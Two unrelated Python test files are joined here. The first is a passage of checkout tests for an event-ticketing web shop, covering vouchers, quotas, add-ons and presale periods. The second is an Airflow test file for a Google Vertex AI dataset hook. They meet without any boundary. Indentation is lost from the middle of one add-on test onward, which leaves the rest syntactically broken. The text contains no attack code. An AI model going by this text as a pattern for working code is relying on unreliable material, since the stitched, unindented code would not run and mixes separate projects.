            price=12, expires=now() + timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertEqual(Voucher.objects.get(pk=v.pk).redeemed, 1)

    def test_voucher_required_but_missing(self):
        self.ticket.require_voucher = True
        self.ticket.save()
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() + timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        assert doc.select(".alert-danger")

    def test_voucher_price_changed(self):
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
                                   valid_until=now() + timedelta(days=2))
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=13, expires=now() - timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".alert-danger")), 1)
        cr1 = CartPosition.objects.get(id=cr1.id)
        self.assertEqual(cr1.price, Decimal('12.00'))

    def test_voucher_redeemed(self):
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event,
                                   valid_until=now() + timedelta(days=2), redeemed=1)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertIn("has already been", doc.select(".alert-danger")[0].text)

    def test_voucher_multiuse_redeemed(self):
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event,
                                   valid_until=now() + timedelta(days=2), max_usages=3, redeemed=3)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertIn("has already been", doc.select(".alert-danger")[0].text)

    def test_voucher_multiuse_partially(self):
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
                                   valid_until=now() + timedelta(days=2), max_usages=3, redeemed=2)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertIn("has already been", doc.select(".alert-danger")[0].text)
        assert CartPosition.objects.filter(cart_id=self.session_key).count() == 1

    def test_voucher_multiuse_ok(self):
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
                                   valid_until=now() + timedelta(days=2), max_usages=3, redeemed=1)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertFalse(CartPosition.objects.filter(cart_id=self.session_key).exists())
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 2)
        v.refresh_from_db()
        assert v.redeemed == 3

    def test_voucher_multiuse_in_other_cart_expired(self):
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event,
                                   price_mode='set',
                                   valid_until=now() + timedelta(days=2), max_usages=3, redeemed=1)
        CartPosition.objects.create(
            event=self.event, cart_id='other', item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertFalse(CartPosition.objects.filter(cart_id=self.session_key).exists())
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 2)
        v.refresh_from_db()
        assert v.redeemed == 3

    def test_voucher_multiuse_in_other_cart(self):
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
                                   valid_until=now() + timedelta(days=2), max_usages=3, redeemed=1)
        CartPosition.objects.create(
            event=self.event, cart_id='other', item=self.ticket,
            price=12, expires=now() + timedelta(minutes=10), voucher=v
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertIn("has already been", doc.select(".alert-danger")[0].text)
        assert CartPosition.objects.filter(cart_id=self.session_key).count() == 1

    def test_voucher_ignore_quota(self):
        self.quota_tickets.size = 0
        self.quota_tickets.save()
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
                                   valid_until=now() + timedelta(days=2), allow_ignore_quota=True)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 1)

    def test_voucher_block_quota(self):
        self.quota_tickets.size = 1
        self.quota_tickets.save()
        v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
                                   valid_until=now() + timedelta(days=2), block_quota=True)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".alert-danger")), 1)
        self.assertEqual(CartPosition.objects.filter(cart_id=self.session_key).count(), 1)

        cr1.voucher = v
        cr1.save()
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 1)

    def test_voucher_block_quota_other_quota_full(self):
        self.quota_tickets.size = 0
        self.quota_tickets.save()
        q2 = self.event.quotas.create(name='Testquota', size=0)
        q2.items.add(self.ticket)
        v = Voucher.objects.create(quota=self.quota_tickets, value=Decimal('12.00'), event=self.event,
                                   valid_until=now() + timedelta(days=2), block_quota=True)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=12, expires=now() - timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertTrue(doc.select(".alert-danger"))
        self.assertFalse(Order.objects.exists())

    def test_voucher_double(self):
        self.quota_tickets.size = 2
        self.quota_tickets.save()
        v = Voucher.objects.create(item=self.ticket, event=self.event,
                                   valid_until=now() + timedelta(days=2), block_quota=True)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10), voucher=v
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10), voucher=v
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(CartPosition.objects.filter(cart_id=self.session_key, voucher=v).count(), 1)
        self.assertEqual(len(doc.select(".alert-danger")), 1)
        self.assertFalse(Order.objects.exists())

        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertFalse(CartPosition.objects.filter(cart_id=self.session_key, voucher=v).exists())
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 1)

    def test_max_per_item_failed(self):
        self.quota_tickets.size = 3
        self.quota_tickets.save()
        self.ticket.max_per_order = 1
        self.ticket.save()
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10),
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10),
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(CartPosition.objects.filter(cart_id=self.session_key).count(), 1)
        self.assertEqual(len(doc.select(".alert-danger")), 1)
        self.assertFalse(Order.objects.exists())

        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)
        self.assertEqual(Order.objects.count(), 1)
        self.assertEqual(OrderPosition.objects.count(), 1)

    def test_subevent_confirm_expired_partial(self):
        self.event.has_subevents = True
        self.event.save()
        se = self.event.subevents.create(name='Foo', date_from=now())
        se2 = self.event.subevents.create(name='Foo', date_from=now())
        self.quota_tickets.size = 10
        self.quota_tickets.subevent = se2
        self.quota_tickets.save()
        q2 = se.quotas.create(event=self.event, size=1, name='Bar')
        q2.items.add(self.ticket)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10), subevent=se
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10), subevent=se
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10), subevent=se2
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".alert-danger")), 1)
        self.assertEqual(CartPosition.objects.filter(cart_id=self.session_key).count(), 2)

    def test_confirm_expired_partial(self):
        self.quota_tickets.size = 1
        self.quota_tickets.save()
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".alert-danger")), 1)
        self.assertEqual(CartPosition.objects.filter(cart_id=self.session_key).count(), 1)

    def test_confirm_presale_over(self):
        self.event.presale_end = now() - datetime.timedelta(days=1)
        self.event.save()
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)

    def test_confirm_require_voucher(self):
        self.ticket.require_voucher = True
        self.ticket.save()
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
    def test_confirm_require_hide_without_voucher(self):
        # This test exercises hide_without_voucher (not require_voucher, which
        # test_confirm_require_voucher above already covers).
        self.ticket.hide_without_voucher = True
        self.ticket.save()
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() + timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
    def test_confirm_inactive(self):
        self.ticket.active = False
        self.ticket.save()
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())

    def test_confirm_expired_unavailable(self):
        self.quota_tickets.size = 0
        self.quota_tickets.save()
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())

    def test_confirm_completely_unavailable(self):
        self.quota_tickets.items.remove(self.ticket)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())

    def test_confirm_expired_with_blocking_voucher_unavailable(self):
        self.quota_tickets.size = 0
        self.quota_tickets.save()
        v = Voucher.objects.create(quota=self.quota_tickets, event=self.event, block_quota=True)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket, voucher=v,
            price=23, expires=now() - timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)

    def test_confirm_expired_with_non_blocking_voucher_unavailable(self):
        self.quota_tickets.size = 0
        self.quota_tickets.save()
        v = Voucher.objects.create(quota=self.quota_tickets, event=self.event)
        cr1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket, voucher=v,
            price=23, expires=now() - timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
        self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())

    def test_confirm_not_expired_with_blocking_voucher_unavailable(self):
        self.quota_tickets.size = 0
        self.quota_tickets.save()
        v = Voucher.objects.create(quota=self.quota_tickets, event=self.event, block_quota=True)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket, voucher=v,
            price=23, expires=now() + timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)

    def test_confirm_not_expired_with_non_blocking_voucher_unavailable(self):
        self.quota_tickets.size = 0
        self.quota_tickets.save()
        v = Voucher.objects.create(quota=self.quota_tickets, event=self.event)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket, voucher=v,
            price=23, expires=now() + timedelta(minutes=10)
        )
        self._set_session('payment', 'banktransfer')
        response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
        doc = BeautifulSoup(response.rendered_content, "lxml")
        self.assertEqual(len(doc.select(".thank-you")), 1)

    def test_addons_as_first_step(self):
        ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat)
        CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        response = self.client.get('/%s/%s/checkout/start' % (self.orga.slug, self.event.slug), follow=True)
        self.assertRedirects(response, '/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug),
                             target_status_code=200)

    def test_set_addons_item_and_variation(self):
        ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat)
        cp1 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        cp2 = CartPosition.objects.create(
            event=self.event, cart_id=self.session_key, item=self.ticket,
            price=23, expires=now() - timedelta(minutes=10)
        )
        response = self.client.post('/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug), {
            '{}_{}-item_{}'.format(cp1.pk, self.workshopcat.pk, self.workshop1.pk): 'on',
            '{}_{}-item_{}'.format(cp2.pk, self.workshopcat.pk, self.workshop2.pk): self.workshop2a.pk,
}, follow=True)
self.assertRedirects(response, '/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug),
target_status_code=200)
assert cp1.addons.first().item == self.workshop1
assert cp2.addons.first().item == self.workshop2
assert cp2.addons.first().variation == self.workshop2a
def test_set_addons_required(self):
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat, min_count=1)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug))
self.assertRedirects(response, '/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug),
target_status_code=200)
response = self.client.get('/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug))
assert 'Workshop 1' in response.rendered_content
assert 'EUR 12.00' in response.rendered_content
def test_set_addons_included(self):
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat, min_count=1,
price_included=True)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug),
target_status_code=200)
assert 'Workshop 1' in response.rendered_content
assert 'EUR 12.00' not in response.rendered_content
def test_set_addons_subevent(self):
self.event.has_subevents = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now())
self.workshopquota.size = 1
self.workshopquota.subevent = se
self.workshopquota.save()
SubEventItem.objects.create(subevent=se, item=self.workshop1, price=42)
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat, min_count=1)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10), subevent=se
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug),
target_status_code=200)
assert 'Workshop 1 (+ EUR 42.00)' in response.rendered_content
def test_set_addons_subevent_net_prices(self):
self.event.has_subevents = True
self.event.settings.display_net_prices = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now())
self.workshopquota.size = 1
self.workshopquota.subevent = se
self.workshopquota.save()
self.workshop1.tax_rate = 19
self.workshop1.save()
self.workshop2.tax_rate = 19
self.workshop2.save()
SubEventItem.objects.create(subevent=se, item=self.workshop1, price=42)
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat, min_count=1)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10), subevent=se
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug),
target_status_code=200)
assert 'Workshop 1 (+ EUR 35.29 plus 19.00% taxes)' in response.rendered_content
assert 'A (+ EUR 10.08 plus 19.00% taxes)' in response.rendered_content
def test_confirm_subevent_presale_not_yet(self):
self.event.has_subevents = True
self.event.settings.display_net_prices = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now(), presale_start=now() + datetime.timedelta(days=1))
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10), subevent=se
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
assert 'presale period for one of the events in your cart has not yet started.' in response.rendered_content
assert not CartPosition.objects.filter(cart_id=self.session_key).exists()
def test_confirm_subevent_presale_over(self):
self.event.has_subevents = True
self.event.settings.display_net_prices = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now(), presale_end=now() - datetime.timedelta(days=1))
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10), subevent=se
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
assert 'presale period for one of the events in your cart has ended.' in response.rendered_content
assert not CartPosition.objects.filter(cart_id=self.session_key).exists()
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from unittest import TestCase, mock
from google.api_core.gapic_v1.method import DEFAULT
from airflow.providers.google.cloud.hooks.vertex_ai.dataset import DatasetHook
from tests.providers.google.cloud.utils.base_gcp_mock import (
mock_base_gcp_hook_default_project_id,
mock_base_gcp_hook_no_default_project_id,
)
TEST_GCP_CONN_ID: str = "test-gcp-conn-id"
TEST_REGION: str = "test-region"
TEST_PROJECT_ID: str = "test-project-id"
TEST_PIPELINE_JOB: dict = {}
TEST_PIPELINE_JOB_ID: str = "test-pipeline-job-id"
TEST_TRAINING_PIPELINE: dict = {}
TEST_TRAINING_PIPELINE_NAME: str = "test-training-pipeline"
TEST_DATASET: dict = {}
TEST_DATASET_ID: str = "test-dataset-id"
TEST_EXPORT_CONFIG: dict = {}
TEST_ANNOTATION_SPEC: str = "test-annotation-spec"
TEST_IMPORT_CONFIGS: dict = {}
TEST_DATA_ITEM: str = "test-data-item"
TEST_UPDATE_MASK: dict = {}
BASE_STRING = "airflow.providers.google.common.hooks.base_google.{}"
DATASET_STRING = "airflow.providers.google.cloud.hooks.vertex_ai.dataset.{}"
class TestVertexAIWithDefaultProjectIdHook(TestCase):
def setUp(self):
with mock.patch(
BASE_STRING.format("GoogleBaseHook.__init__"), new=mock_base_gcp_hook_default_project_id
):
self.hook = DatasetHook(gcp_conn_id=TEST_GCP_CONN_ID)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_create_dataset(self, mock_client) -> None:
self.hook.create_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.create_dataset.assert_called_once_with(
request=dict(
parent=mock_client.return_value.common_location_path.return_value,
dataset=TEST_DATASET,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.common_location_path.assert_called_once_with(TEST_PROJECT_ID, TEST_REGION)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_delete_dataset(self, mock_client) -> None:
self.hook.delete_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.delete_dataset.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_export_data(self, mock_client) -> None:
self.hook.export_data(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
export_config=TEST_EXPORT_CONFIG,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.export_data.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
export_config=TEST_EXPORT_CONFIG,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_get_annotation_spec(self, mock_client) -> None:
self.hook.get_annotation_spec(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
annotation_spec=TEST_ANNOTATION_SPEC,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.get_annotation_spec.assert_called_once_with(
request=dict(
name=mock_client.return_value.annotation_spec_path.return_value,
read_mask=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.annotation_spec_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID, TEST_ANNOTATION_SPEC
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_get_dataset(self, mock_client) -> None:
self.hook.get_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.get_dataset.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
read_mask=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_import_data(self, mock_client) -> None:
self.hook.import_data(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
import_configs=TEST_IMPORT_CONFIGS,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.import_data.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
import_configs=TEST_IMPORT_CONFIGS,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
